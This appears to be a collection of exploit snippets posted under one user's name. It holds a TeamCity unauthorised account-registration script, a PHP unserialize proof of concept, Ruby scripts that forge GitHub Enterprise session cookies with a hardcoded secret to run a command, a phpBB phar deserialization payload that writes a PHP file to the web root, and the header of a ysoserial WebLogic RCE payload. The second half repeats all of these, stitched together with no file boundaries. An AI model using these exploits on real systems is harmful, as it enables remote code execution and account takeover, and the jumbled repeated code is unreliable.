Ali allyshka

## teamcitylte902reg.js
var login = 'testuser'; //логин пользователя
var password = 'SuperMEgaPa$$'; //пароль
var email = 'testusername654@mailinater.com'; // email
/* Code */
var b = BS.LoginForm;
var public_key = $F("publicKey");
var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey"));
var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass;
var c = OO.extend(BS.ErrorsAwareListener, {
            onDuplicateAccountError: function(b) {

## test.php
<?php
$a = new stdClass; // handle = 1
$a->test = false;
echo('Property $a->test is: ');
var_dump($a->test);
$b = unserialize('a:1:{i:0;C:3:"GMP":69:{s:1:"1";a:2:{s:4:"test";b:1;i:0;O:12:"DateInterval":1:{s:1:"y";R:2;}}}}');
echo('Property $a->test changed to: ');
var_dump($a->test);

## gitentcookiedecrypt.rb
require "cgi"
require "openssl"
cookie = "BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRWU4ZGJiNDcxM2M5Nzk1NTE1NzBm%0AYjNiOWQzNDczYjZiMzYzY2Q2ODE5ZjcxNjI0ZDk3YzY4YzQwMmM5ZTliZmYG%0AOwBGSSIPY3NyZi50b2tlbgY7AFRJIjFWVVArTFRXd0Npd0tTVDBaNlZzNDVC%0AekYzdndXd3lUa0UrMzBYcUNCM3RZPQY7AEY%3D%0A--229b711211f74793d491e5b57effeb81a042b5b9"
cookie = cookie.split("--")
data = CGI.unescape(cookie.first)
loaddata = data.unpack('m').first
hmac = cookie.last
secret = "641dd6454584ddabfed6342cc66281fb"
expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
print "Hash comparing: ", expected_hmac, " == ", hmac, "\r\n"

## gitentcookiegen.rb
require "openssl"
require "cgi"
SECRET = "641dd6454584ddabfed6342cc66281fb"
module Erubis;class Eruby;end;end
module ActiveSupport;module Deprecation;class DeprecatedInstanceVariableProxy;end;end;end

cmd = "uname -a > /tmp/owned" # change me


erubis = Erubis::Eruby.allocate

## poc.js
// All greets goes to RIPS Tech
// Run this JS on Attachment Settings ACP page
var plupload_salt = '';
var form_token = '';
var creation_time = '';
var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip
// your payload here
var payload = '<?php __HALT_COMPILER(); ?>\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"<?php phpinfo();#";}}}s:39:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00strictMode";N;}\x08\x00\x00\x00test.txt\x04\x00\x00\x00

## JRMPClient_20180718_bypass01.java
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team
// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/
package ysoserial.payloads;

import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;

## test.php
<?php
class obj
{
    var $test;

    function __wakeup()
    {
    	$this->test = 1;
    }
}
	var login = 'testuser'; //логин пользователя
	var password = 'SuperMEgaPa$$'; //пароль
	var email = 'testusername654@mailinater.com'; // email
	/* Code */
	var b = BS.LoginForm;
	var public_key = $F("publicKey");
	var encrypted_pass = BS.Encrypt.encryptData(password, $F("publicKey"));
	var parameters = 'username1='+login+'&email='+encodeURIComponent(email)+'&submitCreateUser=&publicKey='+public_key+'&encryptedPassword1='+encrypted_pass+'&encryptedRetypedPassword='+encrypted_pass;
	var c = OO.extend(BS.ErrorsAwareListener, {
	onDuplicateAccountError: function(b) {
	<?php
	$a = new stdClass; // handle = 1
	$a->test = false;
	echo('Property $a->test is: ');
	var_dump($a->test);
	$b = unserialize('a:1:{i:0;C:3:"GMP":69:{s:1:"1";a:2:{s:4:"test";b:1;i:0;O:12:"DateInterval":1:{s:1:"y";R:2;}}}}');
	echo('Property $a->test changed to: ');
	var_dump($a->test);
	require "cgi"
	require "openssl"
	cookie = "BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiRWU4ZGJiNDcxM2M5Nzk1NTE1NzBm%0AYjNiOWQzNDczYjZiMzYzY2Q2ODE5ZjcxNjI0ZDk3YzY4YzQwMmM5ZTliZmYG%0AOwBGSSIPY3NyZi50b2tlbgY7AFRJIjFWVVArTFRXd0Npd0tTVDBaNlZzNDVC%0AekYzdndXd3lUa0UrMzBYcUNCM3RZPQY7AEY%3D%0A--229b711211f74793d491e5b57effeb81a042b5b9"
	cookie = cookie.split("--")
	data = CGI.unescape(cookie.first)
	loaddata = data.unpack('m').first
	hmac = cookie.last
	secret = "641dd6454584ddabfed6342cc66281fb"
	expected_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
	print "Hash comparing: ", expected_hmac, " == ", hmac, "\r\n"
	// All greets goes to RIPS Tech
	// Run this JS on Attachment Settings ACP page
	var plupload_salt = '';
	var form_token = '';
	var creation_time = '';
	var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip
	// your payload here
	var payload = '<?php __HALT_COMPILER(); ?>\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"<?php phpinfo();#";}}}s:39:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00strictMode";N;}\x08\x00\x00\x00test.txt\x04\x00\x00\x00
	// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team
	// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/
	package ysoserial.payloads;

	import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
	import sun.rmi.server.UnicastRef;
	import sun.rmi.transport.LiveRef;
	import sun.rmi.transport.tcp.TCPEndpoint;
	import ysoserial.payloads.annotation.Authors;
	import ysoserial.payloads.annotation.PayloadTest;
	<?php
	class obj
	{
	var $test;

	function __wakeup()
	{
	$this->test = 1;
	}
	}